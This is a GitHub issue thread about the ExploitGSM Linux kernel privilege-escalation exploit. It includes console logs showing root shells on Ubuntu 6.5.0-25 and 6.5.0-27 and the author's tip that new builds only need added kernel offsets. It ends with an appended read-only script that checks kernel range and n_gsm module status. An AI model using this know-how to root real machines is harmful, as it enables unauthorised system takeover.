YuriiCrimson / ExploitGSM

Exploit for 6.4 - 6.5 kernels and another exploit for 5.15 - 6.5
MIT License

Ubuntu HWE Kernel 6.5.0-27 #10

Closed lehrhardt-tarent closed 6 months ago

lehrhardt-tarent commented 6 months ago

Hey,

with your latest commits, the ExploitGSM6_5 compiles under Ubuntu 22.04 successfully. The exploit was successful with kernel package version 6.5.0-25 on my machine:

begin try leak startup_xen!
startup_xen leaked address -> ffffffffbc6933c0
text leaked address -> ffffffffba000000
lockdep_map_size -> 32
spinlock_t_size -> 4
mutex_size -> 32
tty port -> 376
tty buffhead -> 136
dead -> 524
waiting setconf dlci thread
Wait 3 sec for ending kernel work execution
We get root, spawn shell
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.

root@machine:/root# uname -a
Linux machine 6.5.0-25-generic #25~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Feb 20 16:09:15 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

The latest kernel package is 6.5.0-27 with the Ubuntu 22.04 HWE version. If you adjust main.c to match kernel package version 6.5.0-27, the exploit can be executed. However, it just fails. Is the exploit limited to the Ubuntu 6.5.0-25 package, and is 6.5.0-27 safe?

YuriiCrimson commented 6 months ago

No, you should just add new kernel offsets to the exploits.

lehrhardt-tarent commented 6 months ago

Ok, understood. I've added matching kernel offsets for 6.5.0-27 in main.c and recompiled, and the exploit then also works with the latest Ubuntu HWE package:

./ExploitGSM ubuntu-27
permissible spray -> 500
begin try leak startup_xen!
startup_xen leaked address -> ffffffff8ce933d0
text leaked address -> ffffffff8a800000
lockdep_map_size -> 32
spinlock_t_size -> 4
mutex_size -> 32
tty port -> 376
tty buffhead -> 136
dead -> 524
waiting setconf dlci thread
Wait 3 sec for ending kernel work execution
We get root, spawn shell
To run a command as administrator (user "root"), use "sudo ".
See "man sudo_root" for details.

root@machine:/root# uname -a
Linux machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

YuriiCrimson commented 6 months ago

cool
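The question in this thread ("is 6.5.0-27 safe?") is answered from the attacker side: a new build only needs new offsets. The defender-side reading is that a kernel is not safe just because the published exploit fails on it. The following script is an added example and is not part of this issue thread or the ExploitGSM repository. It takes the affected range from the repository description (5.15 to 6.5, treated here as inclusive, which is an assumption), classifies a kernel release string against it, and reports whether the n_gsm line-discipline module is loaded or blocked from loading. That second check assumes the exploit depends on n_gsm being loadable; the GSM naming and the "setconf dlci" step in the output suggest this, but the thread does not state it. The function and option names are the example's own.

```shell
#!/bin/sh
# Added example: defender-side check for the kernel range named in the
# ExploitGSM description. Not code from the project or from this thread.

# version_in_range RELEASE
#   Returns 0 when RELEASE's major.minor falls inside 5.15 .. 6.5 (inclusive,
#   an assumption taken from the repository description), 1 otherwise.
#   Accepts "uname -r" style strings such as "6.5.0-27-generic" or "6.5-rc1".
version_in_range() {
    rel=$1
    major=${rel%%.*}          # text before the first dot
    rest=${rel#*.}            # text after the first dot
    minor=${rest%%.*}         # text before the next dot
    minor=${minor%%-*}        # strip "-rcN" / "-27-generic" suffixes
    case $major in *[!0-9]*|'') return 1 ;; esac
    case $minor in *[!0-9]*|'') return 1 ;; esac
    n=$((major * 1000 + minor))   # 5.15 -> 5015, 6.5 -> 6005
    if [ "$n" -ge 5015 ] && [ "$n" -le 6005 ]; then
        return 0
    fi
    return 1
}

# n_gsm_status
#   Read-only report on the n_gsm line-discipline module. The kernel can load
#   a line discipline on demand when one is requested on a tty, so "not loaded"
#   alone is not a mitigation; a modprobe block is what actually prevents it.
n_gsm_status() {
    if [ -r /proc/modules ] && grep -q '^n_gsm ' /proc/modules; then
        echo "n_gsm: loaded as a module"
    elif [ -d /sys/module/n_gsm ]; then
        echo "n_gsm: present in the kernel (likely built in; modprobe rules do not apply)"
    else
        echo "n_gsm: not currently loaded"
    fi
    # modprobe -c prints the effective modprobe configuration, including
    # "blacklist" and "install" directives from /etc/modprobe.d.
    if modprobe -c 2>/dev/null | grep -Eq '^(blacklist n_gsm|install n_gsm )'; then
        echo "n_gsm: loading blocked by modprobe configuration"
    else
        echo "n_gsm: no modprobe block found"
    fi
}

# report: run both checks against the running kernel.
report() {
    rel=$(uname -r)
    if version_in_range "$rel"; then
        echo "kernel $rel: inside the 5.15 - 6.5 range named by the ExploitGSM description"
    else
        echo "kernel $rel: outside that range (still confirm patch status with your distribution's advisories)"
    fi
    n_gsm_status
}

report
```

Usage: run the script as an ordinary user; it only reads /proc, /sys and the modprobe configuration. The range check is deliberately coarse (major.minor only), because, as the thread shows, a point-release or vendor build number says nothing by itself about whether an exploit can be adapted; the per-build offsets are the attacker's problem, not a protection.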